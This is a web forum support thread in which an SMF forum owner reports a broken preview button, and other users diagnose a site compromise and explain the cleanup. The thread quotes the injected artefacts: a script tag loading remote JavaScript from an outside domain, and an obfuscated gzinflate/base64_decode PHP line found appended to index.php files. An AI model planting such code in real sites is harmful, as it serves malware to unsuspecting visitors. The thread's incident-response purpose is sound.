SMF Support > SMF 2.0.x Support

Preview broken, possible hack?

(1/2) > >>

Venera:
Hello there.

I noticed problems with "preview" button on my 2.0.2 forum today. I started to search for problems when i saw this code at the end of my source:

--- Code: ---</body></html><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script>
--- End code ---

As that is code after html tags i guess it is causing preview of post not to show, so i tried to find that code in my files. I searched all my files for "organicfood" and i just find it in one file (not related to smf):

--- Code: ---\www\stats\webalizer\index.html (1 hits)
Line 22: <BODY BGCOLOR="#E8E8E8" TEXT="#000000" LINK="#0000FF" VLINK="#FF0000"><!--b58b6f--><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script><!--/b58b6f-->
--- End code ---

I tried to remove that code from index.html file, and when i'm looking to page source i still can see it at the end of page!

I also must note that i did not add that code myself, and i'm the only administrator at my forum (no one else have ftp/login details). I searched for organicfood code, and i saw that many people reported that their sites are hacked with that code added. I don't have anything on my server besides smf also.
Nothing in error log.

Forum url: venerinsan.com

Any suggestions please, is my forum/server hacked and how can i remove that code and fix preview problem?

Regards.

K@:
Have a look at the files on your site. Do any of them have recent datestamps?

If so, have a look at them, especially for "eval base64_decode" stuff, which'll usually be on the first line, or thereabouts.

In a word or three, yes, I think you've been hacked. :(

Got a valid backup of the software on your site? (He asks, expecting the answer "No").

Venera:
Hey.

Yes, i do have a working backup, but i wanted to see if I can just remove code and fix my forum on that way, without loosing data posted in the mean time.

You think that i should search for base64_decode text in smf files now?
I dont know about datestamps, can you help me about it?

Regards.

Aleksi "Lex" Kilpinen:
If you have an ftp client like filezilla, you'll be able to see the files last modification time. If there are edits done to files recently, you should check those files for anythin out place - iframes, javascripts, eval-codes etc.
You should also be on the lookout for any files on your account that are not part of SMF, and you think shouldn't be there.

If you find any traces of an actual hacking, you might also want to contact your host - it's not uncommon for hackers to compromise several accounts at the same time, if they can gain access to one first. So it might be the server was hacked, not just you.

Dzonny:
Okay, just had the same report for one of my forums.
The same script was in the source, so i searched through all my files and find nothing. Then i opened index.php and at the end i found this:

--- Code: ---#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#

--- End code ---
That is the code that should be removed from every index.php file inside your forums directory. I just fixed all that, and code disappeared from page source.

I don't know how this happened, but i just wanted to post solution here so if more members have similar problem they can fix it easely. (although it's not so "easy", there is plenty of index.php files inside forums dir though)

This problem is fixed, so i'm marking this topic as solved. (i fixed it for Venera)

Navigation

[0] Message Index

[#] Next page